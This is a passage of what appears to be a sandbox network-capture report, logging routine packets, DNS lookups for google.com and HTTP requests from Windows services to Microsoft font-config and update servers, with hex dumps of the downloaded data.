                                                                                                          Apr 26, 2024 23:39:55.738223076 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:55.738285065 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:55.738327980 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:57.284857035 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:57.284876108 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.403754950 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:45.403794050 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.403867960 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:45.404120922 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:45.404136896 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.794699907 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.795000076 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:45.795042038 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.795522928 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.795833111 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:45.795926094 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:45.886908054 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:55.781894922 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:55.781958103 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:40:55.782021046 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:56.044661045 CEST51271443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:40:56.044707060 CEST44351271142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.466666937 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:45.466747999 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.466825962 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:45.467123985 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:45.467152119 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.803989887 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.815330029 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:45.815391064 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.816534996 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.818655014 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:45.818842888 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:45.936326027 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:55.785149097 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:55.785203934 CEST44351272142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:41:55.785300016 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:56.031019926 CEST51272443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:41:56.031069994 CEST44351272142.250.217.228192.168.2.4
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Apr 26, 2024 23:38:35.047666073 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:35.047750950 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:35.810282946 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:36.576000929 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:38.328989029 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:38.329066992 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:38.696954966 CEST53506131.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:39.091550112 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:39.846323967 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:40.974894047 CEST53592551.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:40.976526976 CEST53548551.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:40.987246990 CEST6503253192.168.2.48.8.8.8
                                                                                                          Apr 26, 2024 23:38:40.987678051 CEST5581553192.168.2.41.1.1.1
                                                                                                          Apr 26, 2024 23:38:41.125426054 CEST53558151.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST53650328.8.8.8192.168.2.4
                                                                                                          Apr 26, 2024 23:38:41.675425053 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:41.676162958 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:42.430094957 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:43.191019058 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:43.799391031 CEST53590691.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:44.958132982 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:45.282970905 CEST6186353192.168.2.41.1.1.1
                                                                                                          Apr 26, 2024 23:38:45.283130884 CEST6360753192.168.2.41.1.1.1
                                                                                                          Apr 26, 2024 23:38:45.408190966 CEST53618631.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:45.409595013 CEST53636071.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:45.653433084 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:45.713027000 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:46.396127939 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:46.476644993 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:47.159110069 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:47.247890949 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:47.247941017 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:47.999146938 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:48.752177954 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:52.850733995 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:52.850733995 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:53.606412888 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:53.980413914 CEST53548911.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:38:54.363429070 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:56.276238918 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:56.276240110 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:57.030725956 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:57.790123940 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:38:59.895570040 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:00.558010101 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:00.652441025 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:01.418375969 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:02.177092075 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:02.177134037 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:02.922585011 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:03.327627897 CEST53526971.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:39:03.684674978 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:05.747472048 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:05.747535944 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:06.512871981 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:07.278426886 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:09.060971022 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:09.061031103 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:09.809262991 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:10.559446096 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:12.325432062 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:13.091033936 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:13.856657982 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:14.621321917 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:14.621375084 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:15.386828899 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:16.148886919 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:17.919451952 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:17.919531107 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:18.668123007 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:19.418406963 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:21.169222116 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:21.169300079 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:21.919049978 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:22.683897972 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:22.951111078 CEST53612271.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:39:24.450474977 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:25.216121912 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:25.981718063 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:26.747330904 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:26.747410059 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:27.497234106 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:28.252254963 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:30.012480974 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:30.012563944 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:30.778044939 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:31.528053045 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:33.279520988 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:33.279521942 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:34.043917894 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:34.809524059 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:36.575685978 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:37.325424910 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:38.076679945 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:38.841772079 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:38.841855049 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:39.606594086 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:40.356609106 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:40.649599075 CEST53533051.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:39:42.137351036 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:42.137411118 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:42.902715921 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:43.668334961 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:45.434617043 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:45.434617043 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:45.797169924 CEST53546991.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:39:46.200145006 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:46.965648890 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:48.762552977 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:49.512954950 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:50.278461933 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:51.099654913 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:51.158586979 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:51.919157982 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:52.681286097 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:54.441751957 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:54.441808939 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:55.184636116 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:55.950347900 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:57.841120005 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:57.841181993 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:58.592653990 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:39:59.355745077 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:01.122168064 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:01.876473904 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:02.637545109 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:03.387833118 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:03.387911081 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:04.137696981 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:04.902158022 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:06.668165922 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:06.668236017 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:07.418549061 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:08.184700012 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:09.906136990 CEST53521451.1.1.1192.168.2.4
                                                                                                          Apr 26, 2024 23:40:09.950648069 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:09.950838089 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:10.701565981 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:11.451950073 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:13.218411922 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:13.973999023 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:14.730974913 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:15.481359959 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:15.481460094 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:16.246613979 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:16.997236967 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:18.761625051 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:18.761694908 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:19.513700008 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:20.268138885 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:22.030318022 CEST138138192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:22.030391932 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:22.794078112 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:23.559117079 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:25.324537992 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:26.074455976 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:26.825428009 CEST137137192.168.2.4192.168.2.255
                                                                                                          Apr 26, 2024 23:40:55.889234066 CEST53495071.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Apr 26, 2024 23:38:38.821748018 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:38:40.310482025 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:38:41.825083971 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:38:54.055587053 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:38:55.571832895 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:38:57.075010061 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:39:01.614846945 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:39:03.106909037 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          Apr 26, 2024 23:39:04.622188091 CEST192.168.2.1192.168.2.4829e(Port unreachable)Destination Unreachable
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Apr 26, 2024 23:38:40.987246990 CEST192.168.2.48.8.8.80x515fStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:40.987678051 CEST192.168.2.41.1.1.10x313aStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:45.282970905 CEST192.168.2.41.1.1.10x7ef8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:45.283130884 CEST192.168.2.41.1.1.10x158aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Apr 26, 2024 23:38:41.125426054 CEST1.1.1.1192.168.2.40x313aNo error (0)google.com172.217.165.206A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST8.8.8.8192.168.2.40x515fNo error (0)google.com142.250.113.139A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST8.8.8.8192.168.2.40x515fNo error (0)google.com142.250.113.101A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST8.8.8.8192.168.2.40x515fNo error (0)google.com142.250.113.138A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST8.8.8.8192.168.2.40x515fNo error (0)google.com142.250.113.102A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST8.8.8.8192.168.2.40x515fNo error (0)google.com142.250.113.100A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:41.163079023 CEST8.8.8.8192.168.2.40x515fNo error (0)google.com142.250.113.113A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:45.408190966 CEST1.1.1.1192.168.2.40x7ef8No error (0)www.google.com142.250.217.228A (IP address)IN (0x0001)false
                                                                                                          Apr 26, 2024 23:38:45.409595013 CEST1.1.1.1192.168.2.40x158aNo error (0)www.google.com65IN (0x0001)false
                                                                                                          • fs.microsoft.com
                                                                                                          • slscr.update.microsoft.com
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.45024523.202.106.101443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-26 21:38:48 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: identity
                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                          Host: fs.microsoft.com
                                                                                                          2024-04-26 21:38:48 UTC466INHTTP/1.1 200 OK
                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                          Content-Type: application/octet-stream
                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                          Server: ECAcc (chd/0712)
                                                                                                          X-CID: 11
                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                          X-Ms-Region: prod-eus-z1
                                                                                                          Cache-Control: public, max-age=33936
                                                                                                          Date: Fri, 26 Apr 2024 21:38:48 GMT
                                                                                                          Connection: close
                                                                                                          X-CID: 2


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.45024623.202.106.101443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-26 21:38:49 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: identity
                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                          Range: bytes=0-2147483646
                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                          Host: fs.microsoft.com
                                                                                                          2024-04-26 21:38:49 UTC486INHTTP/1.1 200 OK
                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                          Content-Type: application/octet-stream
                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                          Server: ECAcc (dce/26AC)
                                                                                                          X-CID: 11
                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                          X-Ms-Region: prod-eus-z1
                                                                                                          Cache-Control: public, max-age=33969
                                                                                                          Date: Fri, 26 Apr 2024 21:38:49 GMT
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          X-CID: 2
                                                                                                          2024-04-26 21:38:49 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.45024720.114.59.183443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-26 21:38:54 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=crNMT2weYCUheMV&MD=zS4FTzTb HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Accept: */*
                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                          Host: slscr.update.microsoft.com
                                                                                                          2024-04-26 21:38:55 UTC560INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Expires: -1
                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                          MS-CorrelationId: 8775cb85-bf7c-4476-85d1-2dbe715e01e4
                                                                                                          MS-RequestId: 3665e3ff-649c-4146-9526-9c18cf7e558d
                                                                                                          MS-CV: 8Cjn+zM2WkKah1Yi.0
                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Date: Fri, 26 Apr 2024 21:38:53 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 24490
                                                                                                          2024-04-26 21:38:55 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                          2024-04-26 21:38:55 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.45126720.114.59.183443
                                                                                                          TimestampBytes transferredDirectionData
